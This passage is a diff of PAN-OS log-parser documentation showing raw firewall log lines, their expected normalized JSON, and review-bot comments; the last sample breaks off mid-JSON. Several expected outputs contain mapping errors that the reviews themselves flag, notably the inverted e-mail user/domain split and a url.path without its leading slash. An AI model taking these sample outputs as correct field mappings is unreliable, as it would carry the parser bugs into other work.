@@ -814,11 +837,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "ip": "88.120.236.74", "user": { - "name": "example.org\\\\test" + "domain": "example.org", + "name": "test" } }, "user": { - "name": "example.org\\\\test" + "domain": "example.org", + "name": "test" }, "user_agent": { "os": { @@ -913,6 +938,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "<14>Sep 16 10:00:02 PP 1,9/16/19 10:00,1801017000,TRAFFIC,start,2049,9/16/19 10:00,1.2.3.4,4.3.2.1,1.2.3.4,10.0.1.2,PING,,,ping,vsys,AAAAA,Zone1,ethernet1/1,ae2.11,Secure,9/16/19 10:00,24100,3,0,0,0,0,0x500000,icmp,allow,222,222,0,3,9/16/19 10:00,0,any,0,50660388939,0x0,Spain,France,0,3,0,n/a,0,0,0,0,,PA,from-policy,,,0,,0,,N/A,0,0,0,0", "event": { + "action": "allow", "category": [ "network" ], @@ -1006,6 +1032,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-03-01T21:20:13Z", + "action": { + "type": "iptag" + }, "destination": { "address": "1.1.1.1", "ip": "1.1.1.1" 
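Review bot: splitting `DOMAIN\user` into `user.domain`/`user.name` is correct, but `related.user` now carries only the bare name (`xxxxx`, `pusername`, `test`), so a rule or search that matched `related.user` on the qualified `paloaltonetwork\xxxxx` silently stops matching; either keep the qualified form in `related.user` next to the bare one or flag the change as breaking. Two of the samples do not actually prove the split takes the right side of the backslash: the TRAFFIC line `domain\pusername` becomes `"domain": "domain"` (a placeholder that also reads like a field name) and the GlobalProtect line `xxxxx\xxxxx` becomes `"domain": "xxxxx", "name": "xxxxx"`; a sample with two distinct values would make the intent visible. The raw `name` values also alternate between `\\` and `\\\\` escaping across the samples, which looks like the sample generator double-escaped some inputs; worth checking that the parser strips one backslash, not two, on real PAN-OS output.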
@@ -1046,6 +1075,241 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "network_threat_alert_1.json" + + ```json + + { + "message": "{\"TimeReceived\": \"2024-06-25T21:32:54.000000Z\", \"DeviceSN\": \"000011111112222\", \"LogType\": \"THREAT\", \"Subtype\": \"url\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-06-25T21:30:00.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"4.3.2.1\", \"NATDestination\": \"8.7.6.5\", \"Rule\": \"Rule124\", \"SourceUser\": null, \"DestinationUser\": null, \"Application\": \"ssl\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"INSIDE\", \"ToZone\": \"OUTSIDE\", \"InboundInterface\": \"ethernet1/2\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"Panorama_CDL\", \"SessionID\": 155600, \"RepeatCount\": 1, \"SourcePort\": 51501, \"DestinationPort\": 443, \"NATSourcePort\": 63989, \"NATDestinationPort\": 443, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"URL\": \"www.example.org\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Informational\", \"DirectionOfAttack\": \"client to server\", \"SequenceNo\": 7353954110769176067, \"SourceLocation\": \"AZURE-EU-WEST-CBS-BELLEM\", \"DestinationLocation\": \"NL\", \"ContentType\": null, \"PacketID\": 0, \"URLCounter\": 0, \"UserAgent\": null, \"X-Forwarded-For\": null, \"Referer\": null, \"DGHierarchyLevel1\": 982, \"DGHierarchyLevel2\": 117, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"DN-EUWEST-F2\", \"SourceUUID\": null, \"DestinationUUID\": null, \"HTTPMethod\": \"unknown\", \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"InlineMLVerdict\": \"unknown\", \"ContentVersion\": \"0\", \"SigFlags\": 0, \"HTTPHeaders\": null, \"URLCategoryList\": \"computer-and-internet-info,low-risk\", \"RuleUUID\": 
\"cbc3bd5d-e54c-48d7-a6c7-8710bf593e7c\", \"HTTP2Connection\": 0, \"DynamicUserGroupName\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"TimeGeneratedHighResolution\": \"2024-06-25T21:30:00.103000Z\", \"NSSAINetworkSliceType\": null}", + "event": { + "action": "alert", + "category": [ + "network" + ], + "dataset": "threat", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-06-25T21:30:00Z", + "action": { + "name": "alert", + "outcome": "success", + "type": "url" + }, + "destination": { + "address": "5.6.7.8", + "geo": { + "country_iso_code": "NL" + }, + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "host": { + "name": "DN-EUWEST-F2" + }, + "http": { + "request": { + "method": "unknown" + } + }, + "log": { + "hostname": "DN-EUWEST-F2", + "level": "Informational", + "logger": "threat" + }, + "network": { + "application": "ssl" + }, + "observer": { + "egress": { + "interface": { + "alias": "OUTSIDE" + } + }, + "ingress": { + "interface": { + "alias": "INSIDE" + } + }, + "product": "PAN-OS", + "serial_number": "000011111112222" + }, + "paloalto": { + "DGHierarchyLevel1": "982", + "DGHierarchyLevel2": "117", + "DGHierarchyLevel3": "0", + 
"DGHierarchyLevel4": "0", + "Threat_ContentType": "url", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" + }, + "related": { + "hosts": [ + "www.example.org" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ] + }, + "rule": { + "name": "Rule124", + "uuid": "cbc3bd5d-e54c-48d7-a6c7-8710bf593e7c" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 63989 + }, + "port": 51501 + }, + "url": { + "domain": "www.example.org", + "registered_domain": "example.org", + "subdomain": "www", + "top_level_domain": "org" + } + } + + ``` + + +=== "network_threat_alert_2.json" + + ```json + + { + "message": "{\"TimeReceived\": \"2024-06-25T21:30:08.000000Z\", \"DeviceSN\": \"no-serial\", \"LogType\": \"THREAT\", \"Subtype\": \"url\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-06-25T21:30:00.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"4.3.2.1\", \"NATDestination\": \"8.7.6.5\", \"Rule\": \"Global_Internet_Network_Awareness_Service\", \"SourceUser\": \"jdoe@example.org\", \"DestinationUser\": null, \"Application\": \"web-browsing\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"ZR-EUWS-1\", \"ToZone\": \"untrust\", \"InboundInterface\": \"tunnel.107\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"default\", \"SessionID\": 1787364, \"RepeatCount\": 1, \"SourcePort\": 53610, \"DestinationPort\": 80, \"NATSourcePort\": 36160, \"NATDestinationPort\": 80, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"URL\": \"www.example.com/connecttest.txt\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Informational\", \"DirectionOfAttack\": \"client to server\", \"SequenceNo\": 7372845116442397960, \"SourceLocation\": \"10.0.0.0-10.255.255.255\", \"DestinationLocation\": \"US\", \"ContentType\": \"text/plain\", \"PacketID\": 0, \"URLCounter\": 1, \"UserAgent\": \"Microsoft NCSI\", \"X-Forwarded-For\": 
null, \"Referer\": null, \"DGHierarchyLevel1\": 463, \"DGHierarchyLevel2\": 525, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"ZR-EUWS-1\", \"SourceUUID\": null, \"DestinationUUID\": null, \"HTTPMethod\": \"get\", \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"InlineMLVerdict\": \"unknown\", \"ContentVersion\": \"0\", \"SigFlags\": 0, \"HTTPHeaders\": null, \"URLCategoryList\": \".msftconnecttest.com,computer-and-internet-info,low-risk\", \"RuleUUID\": \"481a523a-44c0-4c37-b2d5-b6b541d775c3\", \"HTTP2Connection\": 0, \"DynamicUserGroupName\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"TimeGeneratedHighResolution\": \"2024-06-25T21:30:00.778000Z\", \"NSSAINetworkSliceType\": null}", + "event": { + "action": "alert", + "category": [ + "network" + ], + "dataset": "threat", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-06-25T21:30:00Z", + "action": { + "name": "alert", + "outcome": "success", + "type": "url" + }, + "destination": { + "address": "5.6.7.8", + "geo": { + "country_iso_code": "US" + }, + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + 
"port": 80 + }, + "port": 80 + }, + "host": { + "name": "ZR-EUWS-1" + }, + "http": { + "request": { + "method": "get" + } + }, + "log": { + "hostname": "ZR-EUWS-1", + "level": "Informational", + "logger": "threat" + }, + "network": { + "application": "web-browsing" + }, + "observer": { + "egress": { + "interface": { + "alias": "untrust" + } + }, + "ingress": { + "interface": { + "alias": "ZR-EUWS-1" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "ContentType": "text/plain", + "DGHierarchyLevel1": "463", + "DGHierarchyLevel2": "525", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "url", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" + }, + "related": { + "hosts": [ + "www.example.com" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "example.org", + "jdoe@example.org" + ] + }, + "rule": { + "name": "Global_Internet_Network_Awareness_Service", + "uuid": "481a523a-44c0-4c37-b2d5-b6b541d775c3" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 36160 + }, + "port": 53610, + "user": { + "name": "jdoe@example.org" + } + }, + "url": { + "domain": "www.example.com", + "path": "connecttest.txt", + "registered_domain": "example.com", + "subdomain": "www", + "top_level_domain": "com" + }, + "user": { + "domain": "jdoe", + "email": "jdoe@example.org", + "name": "example.org" + }, + "user_agent": { + "name": "Microsoft NCSI" + } + } + + ``` + + === "sctp_cef.json" ```json 
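Review bot: in `network_threat_alert_2.json` the e-mail style `SourceUser` is split the wrong way round: `jdoe@example.org` becomes `"user": {"domain": "jdoe", "name": "example.org"}` and `related.user` lists `example.org` as a user, while `source.user.name` still holds the full `jdoe@example.org`. The local part is the name and the part after `@` is the domain, so the split should be `name: jdoe`, `domain: example.org`, and the domain should not be appended to `related.user`; the `file` subtype sample further down goes through the same inverted path. Smaller points in the same samples: `url.path` is `connecttest.txt` without the leading `/` (ECS expects `/connecttest.txt`) and `url.original` is never set, so the raw `www.example.com/connecttest.txt` cannot be matched as one value; `DeviceSN: "no-serial"` lands verbatim in `observer.serial_number`, which a rule on device serials will treat as a real identifier; and `observer.ingress.interface.alias` is filled from `FromZone` (`ZR-EUWS-1`, `INSIDE`) while the actual `InboundInterface` (`tunnel.107`, `ethernet1/2`) is dropped.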
@@ -1208,6 +1472,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "<14>Sep 16 10:00:02 PA-1 1,9/16/19 10:00,1801016000,TRAFFIC,start,2049,9/16/19 10:00,1.2.3.4,4.3.2.1,0.0.0.0,0.0.0.0,proxy1,,,web-browsing,vsys1234,v10213,zone1,a.1,b.2,Secure,9/16/19 10:00,60000,1,61000,80,0,0,0x0,tcp,allow,800,700,70,2,9/16/19 10:00,0,any,0,50660381839,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,2,1,n/a,0,0,0,0,,PP,from-policy,,,0,,0,,N/A,0,0,0,0", "event": { + "action": "allow", "category": [ "network" ], 
@@ -1448,6 +1713,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "{\"TimeReceived\": \"2024-02-06T18:17:09.000000Z\", \"DeviceSN\": \"no-serial\", \"LogType\": \"THREAT\", \"Subtype\": \"file\", \"SubType\": \"file\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-02-06T18:17:02.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"9.10.11.12\", \"NATDestination\": \"5.6.7.8\", \"Rule\": \"Global_Outbound_internet_access\", \"SourceUser\": \"john.doe@example.com\", \"DestinationUser\": null, \"Application\": \"web-browsing\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"trust\", \"ToZone\": \"untrust\", \"InboundInterface\": \"tunnel.1\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"default\", \"SessionID\": 1450762, \"RepeatCount\": 1, \"SourcePort\": 53514, \"DestinationPort\": 80, \"NATSourcePort\": 22444, \"NATDestinationPort\": 80, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"FileName\": \"some_file_name\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Low\", \"DirectionOfAttack\": \"server to client\", \"SequenceNo\": 7292474944208657622, \"SourceLocation\": \"Prisma-Mobile-Users-EMEA\", \"DestinationLocation\": \"US\", \"PacketID\": 0, \"FileHash\": null, \"ReportID\": 0, \"DGHierarchyLevel1\": 463, \"DGHierarchyLevel2\": 467, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"GP cloud service\", \"SourceUUID\": null, \"DestinationUUID\": null, \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStartTime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"ContentVersion\": \"577053022\", \"SigFlags\": 0, \"RuleUUID\": \"c38e111b-43fc-4de4-a17c-c372af557193\", \"HTTP2Connection\": 0, \"DynamicUserGroup\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, 
\"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"DomainEDL\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"PartialHash\": 0, \"TimeGeneratedHighResolution\": \"2024-02-06T18:17:02.077000Z\", \"ReasonForDataFilteringAction\": null, \"Justification\": null, \"NSSAINetworkSliceType\": null}", "event": { + "action": "alert", "category": [ "file" ], @@ -1470,6 +1736,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "ip": "5.6.7.8", "nat": { + "ip": "5.6.7.8", "port": 80 }, "port": 80 @@ -1514,9 +1781,11 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "related": { "ip": [ "1.2.3.4", - "5.6.7.8" + "5.6.7.8", + "9.10.11.12" ], "user": [ + "example.com", "john.doe@example.com" ] }, @@ -1528,6 +1797,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "address": "1.2.3.4", "ip": "1.2.3.4", "nat": { + "ip": "9.10.11.12", "port": 22444 }, "port": 53514, @@ -1536,7 +1806,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "user": { - "name": "john.doe@example.com" + "domain": "john.doe", + "email": "john.doe@example.com", + "name": "example.com" } } @@ -1594,7 +1866,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "1.2.3.4" ], "user": [ - "test.fr\\JDOE" + "JDOE" ] }, "source": { 
@@ -1604,11 +1876,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "ip": "1.2.3.4", "user": { - "name": "test.fr\\JDOE" + "domain": "test.fr", + "name": "JDOE" } }, "user": { - "name": "test.fr\\JDOE" + "domain": "test.fr", + "name": "JDOE" }, "user_agent": { "os": { @@ -2434,6 +2708,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "1,2024/01/12 11:21:15,016201000000,THREAT,url,2562,2024/01/12 11:21:15,1.2.3.4,5.6.7.8,9.10.11.12,0.0.0.0,SAAS vers log,,,ssl,vsys1,Outside,test-Externe,a11.30,a11.25,Panorama,2024/01/12 11:21:15,200000,1,58444,2222,58444,2222,0x50b444,tcp,alert,\"test.fr:9999/\",(9999),test,informational,client-to-server,55555555555555555555,0x8000000000000000,US,France,,,0,,,0,,,,,,,,0,0,0,0,0,,TEST-01,,,,,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,\"test,low-risk\",96eeeef8-bd9c-4145,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-01-12T11:21:15.190+01:00,,,,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no,", "event": { + "action": "alert", "category": [ "network" ], @@ -2459,10 +2734,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "port": 2222 }, - "file": { - "name": "test.fr:9999/", - "path": "test.fr:9999/" - }, "host": { "name": "TEST-01" }, @@ -2488,6 +2759,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "VirtualLocation": "vsys1" }, "related": { + "hosts": [ + "test.fr" + ], "ip": [ "0.0.0.0", "1.2.3.4", @@ -2510,6 +2784,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "port": 58444 }, "port": 58444 + }, + "url": { + "domain": "test.fr", + "port": 9999, + "registered_domain": "test.fr", + "top_level_domain": "fr" } } 
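Review bot: removing the bogus `file.name`/`file.path` (`test.fr:9999/`) from the URL-subtype THREAT sample and adding `url.domain`, `url.port` and `related.hosts` is right, but `url.original` is still not populated and the trailing `/` is dropped without a `url.path`, so the only evidence of the requested path is gone; populate `url.original` with the raw `test.fr:9999/` and `url.path` with `/`. In the `test.fr\JDOE` hunk the split into `"domain": "test.fr"` / `"name": "JDOE"` is correct, which makes the inverted e-mail split in the `john.doe@example.com` sample just above (`"domain": "john.doe", "name": "example.com"`, with `example.com` added to `related.user`) stand out as a separate code path that needs the same fix. Note also that `source.nat.ip` / `destination.nat.ip` are now filled from `NATSource` / `NATDestination` in that sample, so `related.ip` gains `9.10.11.12`; good, but the TRAFFIC JSON sample with `NATSource: ""` should then show that an empty string does not become a `nat.ip` of `""`.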
@@ -2569,6 +2849,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "{\"Action\": \"allow\",\"ActionSource\": \"from-policy\",\"Application\": \"incomplete\",\"Bytes\": 74,\"BytesReceived\": 0,\"BytesSent\": 74,\"ChunksReceived\": 0,\"ChunksSent\": 0,\"ChunksTotal\": 0,\"ConfigVersion\": \"10.1\",\"ContainerID\": null,\"ContainerName\": null,\"ContainerNameSpace\": null,\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DestinationAddress\": \"5.6.7.8\",\"DestinationDeviceCategory\": null,\"DestinationDeviceHost\": null,\"DestinationDeviceMac\": null,\"DestinationDeviceModel\": null,\"DestinationDeviceOSFamily\": null,\"DestinationDeviceOSVersion\": null,\"DestinationDeviceProfile\": null,\"DestinationDeviceVendor\": null,\"DestinationDynamicAddressGroup\": null,\"DestinationEDL\": null,\"DestinationLocation\": \"US\",\"DestinationPort\": 443,\"DestinationUUID\": null,\"DestinationUser\": null,\"DeviceName\": \"PA-VM\",\"DeviceSN\": \"007954000351998\",\"DynamicUserGroupName\": null,\"EndpointAssociationID\": 0,\"EndpointSerialNumber\": null,\"FromZone\": \"untrusted\",\"GPHostID\": null,\"HASessionOwner\": null,\"HTTP2Connection\": 0,\"IMEI\": null,\"IMSI\": 0,\"InboundInterface\": \"ethernet1/1\",\"LinkChangeCount\": 0,\"LinkSwitches\": null,\"LogSetting\": \"default\",\"LogType\": \"TRAFFIC\",\"NATDestination\": \"\",\"NATDestinationPort\": 0,\"NATSource\": \"\",\"NATSourcePort\": 0,\"NSSAINetworkSliceDifferentiator\": null,\"NSSAINetworkSliceType\": null,\"OutboundInterface\": \"ethernet1/1\",\"PacketsReceived\": 0,\"PacketsSent\": 1,\"PacketsTotal\": 1,\"ParentSessionID\": 0,\"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\",\"Protocol\": \"tcp\",\"RepeatCount\": 1,\"Rule\": \"intrazone-default\",\"RuleUUID\": \"f903db52-4b89-4610-b908-67be412704f0\",\"SDWANCluster\": null,\"SDWANClusterType\": null,\"SDWANDeviceType\": null,\"SDWANPolicyName\": 
null,\"SDWANSite\": null,\"SequenceNo\": 7195838274152187101,\"SessionDuration\": 0,\"SessionEndReason\": \"aged-out\",\"SessionID\": 17635,\"SessionStartTime\": \"2023-02-03T16:46:00.000000Z\",\"SourceAddress\": \"1.2.3.4\",\"SourceDeviceCategory\": null,\"SourceDeviceHost\": null,\"SourceDeviceMac\": null,\"SourceDeviceModel\": null,\"SourceDeviceOSFamily\": null,\"SourceDeviceOSVersion\": null,\"SourceDeviceProfile\": null,\"SourceDeviceVendor\": null,\"SourceDynamicAddressGroup\": null,\"SourceEDL\": null,\"SourceLocation\": \"1.2.0.0-1.2.255.255\",\"SourcePort\": 59087,\"SourceUUID\": null,\"SourceUser\": null,\"Subtype\": \"end\",\"TimeGenerated\": \"2023-02-03T16:46:07.000000Z\",\"TimeGeneratedHighResolution\": \"2023-02-03T16:46:07.584000Z\",\"TimeReceived\": \"2023-02-03T16:46:14.000000Z\",\"ToZone\": \"untrusted\",\"Tunnel\": \"N/A\",\"URLCategory\": \"any\",\"VirtualLocation\": \"vsys1\",\"VirtualSystemName\": \"\",\"X-Forwarded-ForIP\": null}", "event": { + "action": "allow", "category": [ "network" ], 
@@ -2660,6 +2941,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "{\"Action\": \"allow\",\"ActionSource\": \"from-policy\",\"Application\": \"incomplete\",\"Bytes\": 74,\"BytesReceived\": 0,\"BytesSent\": 74,\"ChunksReceived\": 0,\"ChunksSent\": 0,\"ChunksTotal\": 0,\"ConfigVersion\": \"10.1\",\"ContainerID\": null,\"ContainerName\": null,\"ContainerNameSpace\": null,\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DestinationAddress\": \"5.6.7.8\",\"DestinationDeviceCategory\": null,\"DestinationDeviceHost\": null,\"DestinationDeviceMac\": null,\"DestinationDeviceModel\": null,\"DestinationDeviceOSFamily\": null,\"DestinationDeviceOSVersion\": null,\"DestinationDeviceProfile\": null,\"DestinationDeviceVendor\": null,\"DestinationDynamicAddressGroup\": null,\"DestinationEDL\": null,\"DestinationLocation\": \"US\",\"DestinationPort\": 443,\"DestinationUUID\": null,\"DestinationUser\": null,\"DeviceName\": \"PA-VM\",\"DeviceSN\": \"007954000351998\",\"DynamicUserGroupName\": null,\"EndpointAssociationID\": 0,\"EndpointSerialNumber\": null,\"FromZone\": \"untrusted\",\"GPHostID\": null,\"HASessionOwner\": null,\"HTTP2Connection\": 0,\"IMEI\": null,\"IMSI\": 0,\"InboundInterface\": \"ethernet1/1\",\"LinkChangeCount\": 0,\"LinkSwitches\": null,\"LogSetting\": \"default\",\"LogType\": \"TRAFFIC\",\"NATDestination\": \"\",\"NATDestinationPort\": 0,\"NATSource\": \"\",\"NATSourcePort\": 0,\"NSSAINetworkSliceDifferentiator\": null,\"NSSAINetworkSliceType\": null,\"OutboundInterface\": \"ethernet1/1\",\"PacketsReceived\": 0,\"PacketsSent\": 1,\"PacketsTotal\": 1,\"ParentSessionID\": 0,\"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\",\"Protocol\": \"tcp\",\"RepeatCount\": 1,\"Rule\": \"intrazone-default\",\"RuleUUID\": \"f903db52-4b89-4610-b908-67be412704f0\",\"SDWANCluster\": null,\"SDWANClusterType\": null,\"SDWANDeviceType\": null,\"SDWANPolicyName\": 
null,\"SDWANSite\": null,\"SequenceNo\": 7195838274152187100,\"SessionDuration\": 0,\"SessionEndReason\": \"aged-out\",\"SessionID\": 17634,\"SessionStartTime\": \"2023-02-03T16:45:44.000000Z\",\"SourceAddress\": \"1.2.3.4\",\"SourceDeviceCategory\": null,\"SourceDeviceHost\": null,\"SourceDeviceMac\": null,\"SourceDeviceModel\": null,\"SourceDeviceOSFamily\": null,\"SourceDeviceOSVersion\": null,\"SourceDeviceProfile\": null,\"SourceDeviceVendor\": null,\"SourceDynamicAddressGroup\": null,\"SourceEDL\": null,\"SourceLocation\": \"1.2.0.0-1.2.255.255\",\"SourcePort\": 59087,\"SourceUUID\": null,\"SourceUser\": null,\"Subtype\": \"end\",\"TimeGenerated\": \"2023-02-03T16:45:52.000000Z\",\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.582000Z\",\"TimeReceived\": \"2023-02-03T16:45:56.000000Z\",\"ToZone\": \"untrusted\",\"Tunnel\": \"N/A\",\"URLCategory\": \"any\",\"VirtualLocation\": \"vsys1\",\"VirtualSystemName\": \"\",\"X-Forwarded-ForIP\": null}", "event": { + "action": "allow", "category": [ "network" ], @@ -2949,7 +3231,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "1.2.3.4" ], "user": [ - "test.fr\\JDOE" + "JDOE" ] }, "source": { @@ -2958,7 +3240,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "port": 0 }, "user": { - "name": "test.fr\\JDOE" + "domain": "test.fr", + "name": "JDOE" } } 
@@ -3080,6 +3363,110 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "threat-url-xff.json" + + ```json + + { + "message": "1,2024/03/12 15:02:32,016401004874,THREAT,url,2816,2024/03/12 15:02:32,10.0.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule-internet,x-fwd-for: 11.22.33.44,,web-browsing,vsys,env,zone2,a1.1,aec.2,default,2024/03/12 15:02:32,1384927,1,49802,80,0,0,0x8b000,tcp,alert,\"www.sekoia.io:443/catalog/integrations?query=this\",(9999),any,informational,client-to-server,7324220311048193508,0x0,10.0.0.0-10.255.255.255,192.168.0.0-192.168.255.255,,,0,,,10,Mozilla/4.0 (compatible; ms-office; MSOffice 16),,\"11.22.33.44\",,,,,0,0,0,0,0,VSYS,FW,,,,get,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,\"Sekoia,cybertech,low-risk\",ea3431a2-6869-4d9f-ad41-1858d80b406c,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-03-12T15:02:32.650+01:00,,,,internet-utility,general-internet,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,web-browsing,no,no,,,NonProxyTraffic", + "event": { + "action": "alert", + "category": [ + "network" + ], + "dataset": "threat", + "outcome": "success", + "reason": "(9999)", + "type": [ + "info" + ] + }, + "@timestamp": "2024-03-12T14:02:32.650000Z", + "action": { + "name": "alert", + "outcome": "success", + "type": "url" + }, + "destination": { + "address": "192.168.0.1", + "ip": "192.168.0.1", + "nat": { + "ip": "0.0.0.0", + "port": 0 + }, + "port": 80 + }, + "host": { + "name": "FW" + }, + "http": { + "request": { + "method": "get" + } + }, + "log": { + "hostname": "FW", + "level": "informational", + "logger": "threat" + }, + "network": { + "application": "web-browsing", + "forwarded_ip": "11.22.33.44", + "transport": "tcp" + }, + "observer": { + "product": "PAN-OS", + "serial_number": "016401004874" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + 
